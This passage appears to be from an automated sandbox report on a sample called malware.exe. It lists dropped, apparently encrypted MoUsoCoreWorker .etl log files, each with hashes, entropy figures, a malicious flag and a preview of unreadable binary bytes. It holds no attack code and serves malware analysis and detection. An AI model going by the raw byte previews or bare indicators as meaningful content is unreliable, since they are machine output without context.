                        Preview:..;..B.ArV..2.@"..4?`...N.e..hQltl...u......A.|.k.8.?..r..>.}f[#...p..F...+..R.k...c.XjB.A..5&_1B..F.....R^f.....Q.wK.L.K...qk.d.{.P....]._.bn..U......Ks.......G5..S-le8L..........1yB.9.~O...J.\kf6...DA.U..]t..o......)...A.P.aL1~.$@..euR...ov.@....J..Y.1.p..Ez........bP-..%.).vO5.o)_(Y.+....W.G.e.uh.8iY.....R...~.A=...h..U...F..Wxe5?...w....4.......Z~..-..{W....q.w........h#5. p..)2D.....N..s...Ut.4G.b$9D.dON.{.S9.E.......[A.pV.P]h....*Z........o?..aV..Q.P....$...#.C..pV........G...+H.9.6k...G....5.c......^....(..\P]..._B..g...l.|.."./...*.b..d.........Ek?..!.!E.......b."...<......s"..H.^..X..GXT....^W_#._J.0\.?..D.....#.Q.U..0.k'3B.........Y.Y2...`.4.......$..Q...m.N....2.../"...f..........J.C.T.t....<...M.'uw...t....@..a09....:z.LG.1.........b8.....U.7.ES..<...f...x(R..!aK...H.+2..s!m..P.;...7O...nc9i..".<..pUR^D..N...})t:)N.]..:*y.@..p{b.p...1...M..N?..*..N...)n>.\w...H.A.R..v...g....W.'c..W!1N..j......J..".D..31....FA.k.t)|.Q.v.

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.5cf9101f-dc6a-47c8-a434-4cad9d63cff0.3.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):20588
                        Entropy (8bit):7.990592107318615
                        Encrypted:true
                        SSDEEP:384:iI9kXfkbbbYIG6AlsyDdwAnPNxwd5fEYHNO1NXaeW2yg7ORl66S:iISXMvEIzAlsyDOePIvcYtCNKLC
                        MD5:EC109A3A55AE24A379AA928190CE5206
                        SHA1:1294284F632E77ED48EAAFA89C9E5CE5DFB3A844
                        SHA-256:33059804D170E4C6A4969E07821931E677532945335BBE435E6725695315A75B
                        SHA-512:3EC0F2FA01D7B238A76DCF15FA1B47CE6B4CC279E315CEECDD4FCC4090A57CB4CDE7225054A6EF1681825FB46173E8AFF239958F695FE27D1BE8AE9F5DAEEF98
                        Malicious:true
                        Preview:.<.....H....._%.o.....H...nh....._..;B.^a..>t....;..g...?.{..../.....C..#z.Gj.S].y..uZD8Fs..}t....`......r...RO...k.....V|.T.r.......j$."...}U...K...~[..g...^...%...n...x..lPl6NJ..4......}BA...&XG.+.;9.0^/..N......p..k...;....=..x...s...eb......gH.m.X...vc.J\.#...0.z>...i2....Fn......&.Rw.....'....[....g....-N..V0....a.v;+....b.....~..T?'...@.....J.P.y.O)....L....27...8.%zW.S;.Q....9.EQ/.........f.Ns.(.>...K...J.....%$.&..........n^.L-.}y..|.r"<..Xz;.h,...st..y..g..++_D%G.Vy.U.>X.m..!E..a.4..Fe1HX|..97.WA......-)^z...f......85.X..b;._....c.B..WV^.G:Y.@7.r4....hO...0n...s.T`.8^p,..SR....&...8..x..MOr&v...!...}`8.Q.g...%.........Y.u....7x.l....`.J......'..PO...[.....7&w3R..s........2...4:.yO...*..3{f......||.. .EV3#.t"...1}W.0..I.fj.q....a.z..>.:...`...T...i..U?.2.}$.G.%6g....\._.~.!....>....W.....U..=..cp.;4:..H.>|....4b......\......M..XJI.L.U..y........#r...R.4U........{)/...Pz.<.K.&.H...5..>e.3A.k..q^x.nw.Q.:.......X5.K%%Y.n6..2K.9C{....P

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.6946adc3-5df1-4ad0-a3f3-2cd8906ea87d.1.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):77932
                        Entropy (8bit):7.998049246508812
                        Encrypted:true
                        SSDEEP:1536:1+TJ0jKIjU9FK9L8AdgP1ppvzSLQvLXvFlDHV/YCp0O2xQT9OPtDfS6J:YTujzY9g9/gztvLXdlDiCpB2xQTQxfSy
                        MD5:09C4FF7BAFF386B48485D6788694B7E4
                        SHA1:D77C651A128C730C5CD725F84A7CC5CD17DB148D
                        SHA-256:45C569AA8313F688B2882807D4C781B4AFC184E0140018C0E86A97683AA20320
                        SHA-512:F6AE750CDC67103F9CDA4B24EBC1BFD1D12B6C205062B4B1D9087EF2A143A9CE30956E8EBAA7C421A91187C2B68A8DD99972BD8CD841C85182E76FFD768BB718
                        Malicious:true
                        Preview:......Y1Q..,.P.1.q.t.$........4..<...T!nHr..bztZ..9........2[.>.C^.:.A...rv.h.4v..(..........s.?....#..BSj....$-r.w.$.b6.....V..( ]....:.58....6.A............B.p...........j.(.g.o~Y.b.T......D.A.._d@A..-)..2....&D....eXy.NZ..n!F..p15..GV.R8.>........ ......l]..[.$...UAA.p..&.}<;.j.........i.hN.b.p......'.....zZ....d.'..u.7......|.._..l..~.j..Ao...r..C..,f..Z3Jx+......P.&...GZ..Bi.q.2..".J.'B..3.}....,.z.*..2..'[y.._.....T.."..0X......>.r........FRg{.Q....hVH.........LB71..%.pR.N......6..Y.&g...X}....k$../.....s..*..S.R.-.t.q.....A-}.....^;JaA|.....oS..rY.l.....W.\..0*.'\.9..&C..o(.L....w.gSP!ACK....<..a.......?..m...sv...0.....n^.....q.a.Vt.W..s.......z..........8.Y.K..q.m...k..K.HP..5....`.H..0.1r..m.@....)..Y..T"3.k./.{.....%lt?.G.#.,..%M...v>3~.3.r.&^_..k0ck@|.L.fy<....U...:...R... v$.-_.....>og.7o=.......$.....7.c5R.s3c+.....[ESi.1...@O...[3.....,..!.8..Y..,..9+....*>.`V....hM.Xz..g.P..,.+...H-..-.n...:`.d..>..TjfG...~-.G..0c..

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.6946adc3-5df1-4ad0-a3f3-2cd8906ea87d.2.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:OpenPGP Secret Key
                        Category:dropped
                        Size (bytes):77932
                        Entropy (8bit):7.997854534488448
                        Encrypted:true
                        SSDEEP:1536:iPmf/q1JnwEt8vGG+PJXEsVA0PQz75bKQyPEEDoUs/v5bOzrc6jD:iPWjA8OGaAKQAEEDoUa5ScqD
                        MD5:D38EE953D66F4DCF591B41A1ACD2482B
                        SHA1:2AC52503A82FF8CE60439724767A4AB4D01189E2
                        SHA-256:49374ECEB1A9A8391C96E5057C360E4BF377ECEF4B60A87D34F9F8F0475A630E
                        SHA-512:18760677DDB0CA32B7FA78CFD88992E8E80230DF74D807AF2C995E26D49154015230FD4D0A04AD72F26A6AA570447011AF226B48D5C85664B386F40D2B9EBF28
                        Malicious:true
                        Preview:....l4$..0..7..."+.S.7..*..OQ.F?..../8..#.......I.1.Z..5...L.o.^(..'/..u]5.I$....$..K.....V;.=&./.....e.X.....S...7W.zjY....&A|V.VF9P.%....i&b.O.2.x..l.n{.!.U.U)....c.N.$....WNy......o......~.|.7\0&..qe.%.#.3Cp.|...[.3bln.+.....D.6..]...}in.....M....r.}J.0?.q.Y!...It 5n.. n.RG..G......G..\g..x............&t.&.k......8|..w/=Xs.Z...2n..H..3.cm.v[..92p.|.C[..su.J.#]H....^..P1.8;...|.`tn....z4..."..5.*U....n.K......B...?Z.LI.1..r|q...(@.Z....f.*s..Z.g.5.QVCj.{Z:1.Sl..R.$...;...Z..1....>...T.Q.M...q......o.m....1.....>...].. ...>KoK.(.....f.|.I........F..........W..Uc.S...o..R...2qKSsKF...G|..r&......<....g.I.%...s.`..t..t.),.....h4&...C...&..|......L)u;.. _..X.....^.........94<.|...@.vk.%..jSw...-....!:(.`e.....)v..g[.E5.1".Ks......&..2w.s:Uf....N.I.....u>.\.QH....1...w..Zk.._*.......M..T}...F.JT..}h...S..&..P.,.....@.Bw..]r.H..1..u.q....Q.z6\.}a.-#G..J...e.Q..9....Y2....~[..C?...k.._]....Ju.|pj..U&.yI............<...*..0.;...mz..|.t].T.

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.6946adc3-5df1-4ad0-a3f3-2cd8906ea87d.3.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):77932
                        Entropy (8bit):7.997447467448831
                        Encrypted:true
                        SSDEEP:1536:C5lf7A0vjZQ3COMkr71mpz3Y2UIdeh+I5/q0LKL4uRPtrAl/:C5lfLjq3qkH1mxo2UNhpNq0LKL4qrA1
                        MD5:E759CD793E3D5723712AC28AD8837E15
                        SHA1:EEB03BBD8A1843430096DB376DBE60C0105E27CF
                        SHA-256:8CA8B76B63BBDFA73295CA40A16E2404DA0CCD465DAFD0681D013D5ED5AA2523
                        SHA-512:21D2B96A0004C28CA3A160AD9AB7DC5B95D6B6281FC99552BB4E63A459B348545A2E7D81A61FFD49F09D8EFDC9E36E17FE9A9D369D55EDBFA6E58951166E2466
                        Malicious:true
                        Preview:..k._h..!...0..(5B..,`P.sP]D.].e.u...o..A...g...-.(..`f..+vK....i.2.....pXs%...\D^...Ph.J..Ji........k.....I...Z..t.E)V.2.Mjv....j....5... .fo.H#.%-..'...._[<x.....c....?.M.E....c...%./.`....'%..4.74O.Y6,.Lq1a....5..}....4$".......=s.?.9...z.).F.N...w...n..*})^K.....me...#....'d ..u.].8...P.T.'.iFG.(...Ym..a.- U.....5L..7I."..r/G..........yK../.3.V.:....~BN@\.p@.<.....(t.a'..1JnW.n....>..u#....*.}"..<......p.mw..U.......4.V.....Y.J@....K..v...<.7..d...Z^...t..Oiy;..d2.G'.k...f.'..z[...D.K.......23...]3.,..2MB..y..bZB.|U..@-....qZb.T.B ...#..R..,......v.4..>....n.....-.....Y..........x.7b^...#K..n.Q.[.. ...s.+.#8..V_f%'...,p..9=..9w.W.u....<Q....'..!.S.=....^NT2..l.;!U.-..EE..*>9.p.[`.m.......Ppyn.l.)'d....\jc.u.s...!/..K.]R./.*s.l.....^...~....)~.f7..a&-..[a..$...P..z..#.7f.d...gZ....53....Dl.'y.I.B.+{.eH...y.\..gS.....'b ........i..*...X.U.u.|..7.O.c./T..=.*.38...i5.X..}...N.QW.lj..EqZ.....FD...f..hr.?..*Ey..q]...I.......Pkj..

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.6946adc3-5df1-4ad0-a3f3-2cd8906ea87d.4.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):77932
                        Entropy (8bit):7.997377108941663
                        Encrypted:true
                        SSDEEP:1536:QGx7CP6Mac4fD/09kbWyi9cG3eKJJVM0SM1dL8fSuryKTY1LfFf8lQSh:QGxedaWk8S89G0S8MDTY1L9UlQSh
                        MD5:90D44612F641A5B3EBB524FC109E6665
                        SHA1:FD9A5E9542471002147351E8A1403D4C3F516E1F
                        SHA-256:CEEBDC9601CC91487D5A34DCE71DEE920FBD53C5164D8B4E07BBFB61A83CE982
                        SHA-512:322799FC7B51211C1308E60BF0E920CB03A7825AAA79B3A1E54B862C3931B8DE91893E88E06BD363108C951965BB49335962A3C61DAC4A08E565243D69141669
                        Malicious:true
                        Preview:.,..i..{..'c.D@\.7 y.g.;s..|G+&.V......s..&u...q..%...(l.5.....2.#)..(2.....N...#....S$..[V]..2.fg.1.ix.o<.P...@..d...._NmO..P1.f.....|uL..-..W...x..T.....K]...}5...i.-.....3>......U...D...EW.)u.*.`.!L..H..;.d.......o[........S..)RrF.!c.l8A...s....lmZ..|..|L8..g...6d)_..Q+a.Mfn...^...3..[.u..*U....g`.n..l.9G.h.p.<..B..|..*=..S..A.*.F.$:.k.9S.....g.5.8g."5..|W.....xE.f...U.A.|.....a8./.......f...._$X(.?F./......5m.......rg.O..$C...dX=k.\ }'....<[:.~.......0=..5..G..$.=eq.E.!..X.....8.R+c....>.........s..BR..t.3.G.`5...k........[k.........@#.g..o....6.....}Z.......fp..\G..T..}e>.Y....rUc./..p.k..4P2l~.U......o...KW3,^..Z..lRJ..o1P.?..|...t....TR..Eg..Ji..p.<..Y...*_..P.(\.......%.....j..m.Q...r......t...q...)...n.....1..H~c.w....Lq.N./..G.........^...M.d!.......5-C6]....s.K}E.p.:.*f..P.WhI|.......T..,1.(.~...F....#.e.C.....V..#....;...M./.;....Q.c.G.`...I..U.p.H.)......F ..,....;....1...'P.......cz.Ad...........`>]..zx.....[N.......ju.7V[...i.k...

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.6946adc3-5df1-4ad0-a3f3-2cd8906ea87d.5.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):77932
                        Entropy (8bit):7.99788197155403
                        Encrypted:true
                        SSDEEP:1536:/4ok6GLc4pVIqxchReNx0CdMk7rmuYGTb8TBG2nIL8sfsp9+wjtswi:/k6EaqUoX0Qr/YQ8TrnILwpK
                        MD5:F640ED40D54E7F942225D3DEC15DAFF0
                        SHA1:7EBD1A5CDDC56C667F186F1ADB91F9DC539576FD
                        SHA-256:1D7A648CBADA6E96C80DF3A2FF96097EF78074681FB25A66CDA88673F8A7D532
                        SHA-512:6D627D1051A56EF76EE5579538CDD60C3FF865A225A72D8371757E81C5273A78FE6F1D6EAACE3653BE22F1C9207C7590103663598CF99FD1184325A0BF0B754B
                        Malicious:true
                        Preview:s(.aM.D....|.B..v.t..c.X.N)..>.%v ..Dr.!...h.,.8.^n]..1...jZ.4..!On|.....b...A....Z..xc.............W7..M ..<F.5YR.m..........". .@u..6..a...g.%....I.%..N.q.?.....U..`y......T.FO....lN.U.M.._..i..!.q......7..s.3cT].xl,K..Y......~.pGy{.e...\......-.. .K../cR.:..g....J...9{n..../_N..f..x.. ......b.....U..n.L./.TS.....3j.r..?.a~a;..R...&j.N..O...?.r.I......i.B.n$.0..{Y.xk.....wp.}E<.l(.Nq...u..T&I.f..e..Uh.K...$.:D......O4.y......6..3....%.].gR L.}....K_....$......gxh.(Y..^2$.....d+..|y....Ok..mM.....3.c.(.q..~..dC....j....S,.j(.(..a.R...o.i...f....:8..2.....Yd.n..X..P.U..>.N)..q.C.d......T.7A.~[!......5..J....}3....y1...8M.....4......r*y2..5.&...j..6..t]..W.5.2..*.[.<..2X...y.N..E.Y...p...d4.h.$...>.GVQ..`Sf....=....+[.......k2"u....q.'..6.kz.].....Cc+)&.8...0..~..5=..4/....Q..y......J..D*...|.#H...>RQ.B....R.\..a.O.........A..s..3...X..}...%[.......,..Ui.#..U.:6.........~...S.#..a.....ZK..&#r..?u^Lx...,.t.JKi...g.Pud..&1yA.[...%j...4..

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.6946adc3-5df1-4ad0-a3f3-2cd8906ea87d.6.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):32876
                        Entropy (8bit):7.994189079386193
                        Encrypted:true
                        SSDEEP:768:0GSCYjGSon4ikxVGvTo7ZrN7dxk2jz5/hLl0:0/Ckwn41xVGv0VrN7D7vl0
                        MD5:B3E4FB2976BF7E8876EAEB1E4778B395
                        SHA1:9C1563E22DA695B188D9CB2A9EE1CB0CA40DDE32
                        SHA-256:63E39BB40327D1C0F966C0BE44896F5F44591616B5BD58339E540A0AD2D7B455
                        SHA-512:B597CFB00BFCF0AAAD7FC4DE02CCED289418D9134E99CE8D80EBCB4E77BE5CE893614A1721BE75A32B7D8E7EDF2B74AA65AB33000B81624B267317FC6C541330
                        Malicious:true
                        Preview:~<\........\...M.a...`f.c..B*...GA...@.K.F...M.p.>w.........)...L.Xn..........).....u^uO.........7:....eP.0..\.%.:q..G.<&.pi.&..2E.a]..~.E...@P..........q.>#.I.V.R}e.......K.<....ieN...Y......U..W%S.fh.yo.t.......:.M.4I.l.j.......c%..=.0J\.....K..".3..^...r...yp.|f...&..".e.n.\."..........v#U..E.4.......x...g[2..@...sBM.6@.m..K.2..../"`}..#6*Y...;.......UQv........YX.P.t..k.$l...'.:.z?.w..$#.'....0.!..F.0..b..m-e.d.......e...<......v.TiNeK=......h/..+Y4.wG.&.....54.|...'...):...)N%z9..pa.T...=]Y;..._Z.K.P...,..o8.;....z..@(..:fn.%F...O.-D[V"E.e..BiD$...J.T.#......]....g0x...Y..7..I#.w.$..5...]..o....O..B..z'..BJ.^lo}..e....]..j....w.5..."..f.....B..>.D..."w1nS....j33..5..m.v]]..h..`.5..J.j...S.a[S[...6n....XB,......N..=... .;%.R.....)b.p.z..-(..B.n...M=....d...F.q....F(..}V....l.9..$.@.sdDn-..,<i...Wb..\>.b.fT..ic\3..e...j........P0.".8a....MA.x..v..f.n....x....m.l..^^YW.F........e..S*1P.....6....1........~.h...|..^.H.....+3G..z

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.69a57cbe-2a9e-4202-9484-4bfde9ed5d83.1.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):53356
                        Entropy (8bit):7.996851766043635
                        Encrypted:true
                        SSDEEP:768:lrcs7bOw8dpYW4Q7sZejWZsbHlOr90busaSCB1nG8Gi9R3fkspMh39JC06zz1Skl:lh8X7VjFHlOxeaSOGO1fq39UbhSCIEL
                        MD5:73AF279478258A55228A8F85BB9244D2
                        SHA1:819709617E07C5D5B6D8E10928206522B5699F97
                        SHA-256:B31836FECE55DC93B08F2BDB23C03EB57D3296580894168890E5EE54958CC4C9
                        SHA-512:AD1D8B101387F103F4D51BAAC067816B81B996292B4060E6BEF877ABAC69E55EACD749A8147A526D42933CD4251CF4BDA9AE61171E72F0CB226F3754AE3587F2
                        Malicious:true
                        Preview:.....TM....,..j...*_..P.........._.X..1...3z@0g}.r...P/[.V...:.G........ ........x......E}yeTE.+g...6.\....P.-QX.'..e..S......t.1(.....Wq.vF^f`a>.........A..IG..V...!q..3a...`..`.....$.LOE......W..m.8..7..P..>J..u_....B!.p..S%..[&U......0.5..w..&bYJ+.p...(m8....Q4.$7.I._..S..RNDd)......s....<....%33..=...8..C.D...@.0.4VE.r.>...}%O...n..7..K4..qPM.....!...{....;.h..Gh.T...V...H...a.~<.......Y].bV.<.....bR5..p|Ee..q............p].H.t.4F....P.!+..........w.I.2...p.a.d...Gv.3:...?hg.-...[.!z~......~.....!{9.M.R.....kp....M.>..M.Pr..p(..WX...0..`...}.C.W[..-zT...'."u.<T.e.Q.../.g.. .....L:%W{.e........`..}......o.....Z.C/....Q...|.=}..[.|.#...9hrd.I..nz>..(N....|..P.y.?3.L.P......W..jR..vJ...3k....>T}.......o.;..B..$..S..L....!^.=.....B..N.a.k.iV.8/...6a..L>.r....PlR.|k........l..8.....4Y.XZf=..=zz.!.D.Lm.C.`U.. NW.A.V...........~=.z$...,.9}.[u......h...k})..>}..n..*..V. ..(..F...aQ...wk.L....P|T...+.}....V............-!.....$C+&k.5w.g"..JP.

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.6d9d4a0e-ffd8-47af-9ba4-1a437149f527.1.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):77932
                        Entropy (8bit):7.997959488236247
                        Encrypted:true
                        SSDEEP:1536:duZPNDLBClq2TdK1uS9i5kQ5G6rmUzz/OwDmPo+IPmeUPDU+hLcUFJ4+1TpOc:kdezTdK1BA5kYG6F2wDvPKwAvJ1pOc
                        MD5:61A47EC567CD923B6B549C3238A37570
                        SHA1:4504A9543380A60678B5B3F1BF827E14F05E5211
                        SHA-256:7BA6C9BDF91375BB1FC49EE3851C175D1ECEBAEBBAC676FDB83C87681C7A4A21
                        SHA-512:9739E8BF5A50D6EE65F6E1FF84C35C8F207716F0C92B1B6E07A8ACEF64CDDCFD7434BF8498D8E30064A049320D12E47C7B28F5950D94D42B549C02E9F6FA6E28
                        Malicious:true
                        Preview:L<&.)..!y..t.f.....:F.1.......G....".%.....;.......Dx...]..}.k.h.+.P.jc.j...<7.]@...........[.Kc.D...................AJ....;.Y...".!.j(...L.....s........_..N.E........ze..d.p...=.....p.J.s}....L......G........6.79i~[.Q..Q.h...E..#..p.L..49..a....S.....%N..w..........t[^...,..}.3YI..=...:Sb..l..........M.....6!c.A.|9...b.m...EPH;....."g.._@...m...[.....ca...5..&c...\"...{$M..E..f..3....@/.....5.}.o...2......".C.X.T.R.$.#...].&..m.W..?^R............H%4J......K.].M}.m.Q@. +.vra..{...p......k.....y.N.t....;.........o.v....x.'.3..[Wk#...G....6*..)k.-h./... '..B.p.y.2.x'(.+....j.3.._....2..u*.p..t.n.6T8..t.@.L..z.<%'...t...}.hZk.........i..GN(...;.,.j...La4.K...0.C...<.P!......C.........e..........|q.K|.:.{.s.Fj..xd.....:...V.,....G.R.......3.......1.A.ZC..[..+..2..x.Mi.....{.y.....U4....=d<]C.E...H...[?ZQ:..@...4.H.J.K.G...P....k..i..T....=..B..;=L..5......f,..7f...q7.y.ij..Ri9r.M...?..t.a}u1..kp..5..[.Xp:v..G.Hb.y..3....k..ed

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.6d9d4a0e-ffd8-47af-9ba4-1a437149f527.2.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):77932
                        Entropy (8bit):7.997241377252332
                        Encrypted:true
                        SSDEEP:1536:B0EvF9+Cb//XURy3CVOXzB+LZw0M54HZDfED8KoY3lz/kTQxbyKWN:B0q9Bb//kUNXhEZDff3cz/kTQ8KWN
                        MD5:6CDC5E91C0CA41DF7E49ACC9DB65CA5E
                        SHA1:E765DEF0F893B6EFF1BF0CFAFEC3647ABE1048F6
                        SHA-256:03313312CD309F6A87D53A2651569D64D88E64E33DED5FD4CDC47DB839C33762
                        SHA-512:E9D0B0CA4376E78DE9E688BD2FFD4C8637DCC6332611B5B26733265CFE2204AAA5EA594C6A9CC60E7DAC2CF598A50391DBA7F07165E739DF04B28A837FCA1CAF
                        Malicious:true
                        Preview:(.#..M....P..I..1s$;`b...m.E.PR RBl......'R.2...x>Lp..F&.s.c..L....BVR.....7....2.L........."...\JEO..:.~..4....Q..i....6..z5}bq..C.3._7du.9.U..Ot..,.O..\e%....#.Y..b.'.T.Z<k@"4.w(2.t....*.Sp.....Bh.../...F..<.O..R.2.......7{....j^o..<..o.=&.VNf<-ogXK..;7.m0...,...g..WT1h.V..).G..o.*:..b..\0..8.. *y.[.^c....-.......SFw'..u.....a..7.....J.....if.s1......F.....e..@....L-3...5H..yQA.7L.^9........?.z..n.-.f/...5{-aY.K.......G..w9...@].t$9.t.tsf.....=...s...."...5l......V.'..Gr.|_....G.a...5.b..JV..dwn#.._W....C.......].%...u9..I*.j.r.Z....1=.'.5.....z..4...C.I..a.X.M.nV=."..B%...).$T..5<<}.!^.....%H..p.Q(.j.j.."..G..,...3B..V..H?..@,..._.......&....T.{.....%..S...CM....&........g`)..h`.|...BG...#....b.g.....s...e.....P."F..o_T..i..Bi....(x\|.,.....E4q...B..F..G.:..H.).W...A...q..Z.X.K(..qd..hP.......S..R..EX.............p%O...$=j...q.....J..-..W.(.=..`...k....Q. ..n6.A..oNf.....n|...v.r||...Y.0.f..#.#......mc.#.....P.<iK..|.b..[........z.

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.6d9d4a0e-ffd8-47af-9ba4-1a437149f527.3.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:OpenPGP Secret Key
                        Category:dropped
                        Size (bytes):77932
                        Entropy (8bit):7.9977865670074015
                        Encrypted:true
                        SSDEEP:1536:Z0Q/uUIZKB7lpZkElCvNwwsqkl6FcMhTkEBMDAPLn6ad7k2C58wE04p+YT:eQ/uUIApZkRlwwWl6RxOaZCqXD
                        MD5:91E1179634D699F213EA550EFC183866
                        SHA1:40C1B877BA2BA8D444421AA8959E45EDAE77D399
                        SHA-256:474C1C70548ACDA2FC4C028C7904C78B3515AC7843BF49E21DCDAE67E4E6115B
                        SHA-512:63CC08164A5E3FA8B698370F6F50F0B24C7E51AABE457C7FD1CD24E409FE341033F96DB4D5A7FF530E0ED165250DE86BBD7984E9CD986A630719D5007DAF8FD0
                        Malicious:true
                        Preview:.....;.v.l.8.Z$....v*en/...Vg.'.L.IC.xN..R.."...v..@....-......D.*$j5I....^x.._...Q..0....nK.F_EC.+.X.....w}K.ZJ..5..A0..R.>*y.......7..o.....5.......2.....+......P.e.n..c\.~.......n.........Kb....O....w.B..r..'D..8...)%;W.......SF`......!....M.....'.4T....R|..._-.zo...rF..v..PK$.VXr.{.X;..y..l9.[fl.......6..u6,X..X..>...E..O.*..{.h..s].;F2..!......Q.z....J..p'...u.`.+\d...0A..S.6..\;...T'...jp..C..)a...C.>/..)..nn.TR"..x.`h..]..!....-.T..C.u,...... ,.k..r2...Q......6...@n.....e......X.%....3m.+o,....t.......-...o....Z..W......#.gf..b(=p%.r.J<..>..y{..............r......<... .........$....'.....r2.r..`.:.......AQ]O..A`g..X{..i...&.x{r...~|..Z`.q..=..........%.\..K.P..j.55..............n._.}.9..+m....'....H..<.q.....3.v...o.g.A...c..CG........a.W%$.u..H.Xa@&..w.c.S.=..xn0..Z..e.}J5..L.>lu:.^.*."+C.n.Q...c7..V..$...z.{..].......4..../..d[...".....6....Ae..!...h..[wx._.3h'......B..^P.....&G.....R<.j>.O.Ln.%..XYpk/...N.z<^J`..

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.6d9d4a0e-ffd8-47af-9ba4-1a437149f527.4.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):77932
                        Entropy (8bit):7.9977816370848895
                        Encrypted:true
                        SSDEEP:1536:koqv50Ul9HvPTWazYb97dol5GsJS8st+DpVEHRUmqZgyhAF3q/zS:9I50UlhvPZzu97dcJS3c+HRU3XhAM/zS
                        MD5:10C9E780FC4E2704A40EB6B0B489AFBE
                        SHA1:08426F18360B16D6EEDF93712215FCD26E71EF46
                        SHA-256:D201A27A2BD775786E3C002BDA5E8AF8B279D0CF05A33E5510B426569DD638E9
                        SHA-512:8ED412FFC21CFCC742F1713A6040FD15CA3659157758417445E300630E6DEA47CB17007C38CA50B6DECB997934E4F727E3F7D94336822FCA5BE4B51CBC5ABC95
                        Malicious:true
                        Preview:.K..FuJ[`z.:..G.,.....|...H(>......kv....W..Y..+...c\.C*..j.q1.K...E..........?..]O$a.r..W...d..Ri..q......n.~".,s.....|..W5k;...b...F...&...mg...>b=.5.X.....JT".....6..k..SMXe.U"..dk~S.....,.;.1.p.:E..&q.(....c...$+......qx...........W........:.....d.p.2..Q.H..c.Lqc.~.> .5hm%#VS..%.&l..0....k..,.yo.O{3.H5..fb.....Z.;.I...........j. .'%F.._j..7...*|...@..O.1.Y.ty..RF4.nW..~O,..o./..Ie.G;-{.....PLE...a# 1......q......>.........OT6....%%...U...k..A.dFu.^/.[1.9..g..0F...M...L.I......8..Q..o.../.f.R...&..Ic.1..v.%.."..U9.........4.U.'Wnt..I.Z]...h....\.S[.]2..._.@...;.{.i.b......s...(.i.<h.@=.6.....3....a...U!..[a.....%.;0..2....H....Qo1.%Ory.i.uy..,..r%..u.bs.......e..$H..+.FW.@."r....xf....y.H4...........si?A.v1.,....q.J.m|.q.a.z.....sK..@].w'.Wse7.lW."..d3%.:9..'.N.q..7...!...9..B..........(....8V....+>..@M......t..............(g........#....$gQu...E.a.G.]!.$....CI![F......j../~..=?Z.^.y.|.*..9..*="..\...>.).uX.Wb...u...DMNc..A#.U. ....

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.6d9d4a0e-ffd8-47af-9ba4-1a437149f527.5.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):57452
                        Entropy (8bit):7.997007106550798
                        Encrypted:true
                        SSDEEP:1536:vZGAE73rGOWiXoqeIq3qTWG9/h7f08y5wjrP+cja8MjSkjRG:xG1WpIq6SGt5pB2qa8MjSkVG
                        MD5:3F11B31201A477C30B69CA339DA60CD6
                        SHA1:5EC0ACA980E0B5F76FF53EFF1A8192A6281AF577
                        SHA-256:7C3AEA13D040573F78A9B746CF321E7859E78105D9DE4D2BB8477AFB66A2265C
                        SHA-512:361C4EA5B7A69D49C7B030A5F2CDAB747E612250DED2B2B3AEF1E5C81D467D69AE2E6680478708F4F8D86D41DF3264336887E233F4B4BDBD1C562D5E0106FB06
                        Malicious:true
                        Preview:..\.....}. ..E........_lB....X...H..T.U._.<6<...lC.I.[.oG...Y.M.L\.|.D0...d....5...uo.2...x.{{k5...-.v...mh%..X/q...X....$`..O...Mr'.|'...s1. .g~k...~.tU.>_...?.W...:U.......?..6R...a..._>.9.,...#......9...$"z].e.u.....Lc{Y..."9DTY..l...i8...Magg...I..U...........2...........$|..>.^..Pr.yh..-..n.4....pS.t..7...?...Iud.-....RbN:.....<..$..]..,f...E.}.EK......<w.*...i......{=..........T....".q.!...$_...y...P.Bk.8S./...}.pK......X....S....}..#....6.569BJh..x...|.i..<...Q...13.7....U.'....".0...k.]Q.\....$Z......&6.(.B`(.I.x..%..w....q.Z...1..._...o$...e...s{...)..:/.E.i......7P,D...Cb.z....d9..R...B.='D..S..+fe.....6..........:.=.B.&..pFR.*... .N...1.........m.c.Q....<......W..._Z.v.V.."........ws.Vy.g.=F..-.+s..f...*..Y1...S..l.....8...W.!......o...B.#2....v.J...u.}k....>.M....V..g.D.h.*.gIaP.C.Mg..V`..;.%..C..6P..........^.yW.]..#..h..t...c.\]...X..L&.Bi{C......z.S.~.s~....T.......$.fV.Q6...4H..N........2.....P....._..{.w..r7j..5R>..Z<.6|K

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.76c07319-aaea-47b0-8c40-094708538806.1.etl

                        Download File
